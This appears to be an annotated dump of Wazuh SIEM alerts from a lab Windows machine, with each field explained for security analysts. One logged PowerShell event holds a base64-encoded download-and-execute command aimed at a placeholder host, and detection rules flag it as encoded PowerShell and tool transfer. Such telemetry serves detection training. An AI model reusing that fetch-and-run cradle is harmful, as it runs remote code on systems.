rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535011.2650331 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:50:00.8040331Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2429 Incremental log record number – handy for timeline order.
data.win.system.processID: 11200 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:49:00Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:49:00Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Application Compatibility Database launched Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92058 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1546.011'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Privilege Escalation', 'Persistence'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Application Shimming'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535028.2651913 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:50:26.9576523Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 345991 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:50:26.949
ProcessGuid: {94294ddc-c032-680a-c10c-000000000e00}
ProcessId: 12176
Image: C:\Windows\System32\sdbinst.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Application Compatibility Database Installer
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: sdbinst.exe
CommandLine: C:\WINDOWS\System32\sdbinst.exe -m -bg
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D
ParentProcessGuid: {94294ddc-ea9e-67fe-9c00-000000000e00}
ParentProcessId: 5424
ParentImage: C:\Windows\System32\svchost.exe
ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:50:26.949 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c032-680a-c10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12176 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\sdbinst.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Application Compatibility Database Installer No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: sdbinst.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\System32\\sdbinst.exe -m -bg No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea9e-67fe-9c00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535292.2657390 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:54:09.8291801Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43993 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535294.2664727 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-DistributedCOM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {1B562E86-B7AA-4131-BADC-B6F3A001407E} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: DCOM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 10010 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:54:50.1356572Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3069 Incremental log record number – handy for timeline order.
data.win.system.processID: 336 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 17180 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The server {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19} did not register with DCOM within the required timeout." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 113 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535326.2666249 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:23.7159287Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350093 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:21.968
ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00}
ProcessId: 14568
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bbde-680a-d909-000000000e00}
ParentProcessId: 14832
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:21.968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c159-680a-cb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bbde-680a-d909-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 117 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535327.2673135 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:24.7769762Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350094 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:24.705
ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00}
ProcessId: 14568
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_asllzuor.2bv.ps1
CreationUtcTime: 2025-04-24 22:55:24.702
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:24.705 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c159-680a-cb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_asllzuor.2bv.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:24.702 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
